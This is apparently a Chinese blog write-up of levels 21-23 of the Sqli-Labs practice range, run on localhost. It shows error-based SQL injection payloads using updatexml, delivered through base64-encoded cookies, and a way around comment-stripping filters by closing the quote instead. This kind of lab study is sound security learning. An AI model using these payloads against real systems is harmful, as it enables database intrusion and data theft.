Sqli-Lab | Less 21-23

sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入

Less-21

Less-21 Cookie Injection- Error Based- complex - string

cookie注入-基于错误-复杂-字符串

测试

登录进去

uname的值被加密,以=结尾,首先想到base64

不出意外是base64加密
burp抓包,然后改cookie中的uname再加密就可以
payload

admin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#

源码

设置cookie并使用base64加密

调用cookie中的unamebase64加密,sql语句直接进行查询并返回错误和结果

Less-22

Less-22 Cookie Injection- Error Based- Double Quotes - string

cookie注入-基于错误-双引号-字符串
payload

admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#

Less-23

Error Based- strip comments

基于错误-有过滤

测试

http://127.0.0.1/sqli/Less-23/?id=1'

http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+


都多了个',应该是过滤掉了注释符,那直接用引号来闭合

http://127.0.0.1/sqli/Less-23/?id=1' or 1='1


payload:

1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1

源码

对注释符进行了替换

你可能感兴趣的:(Web)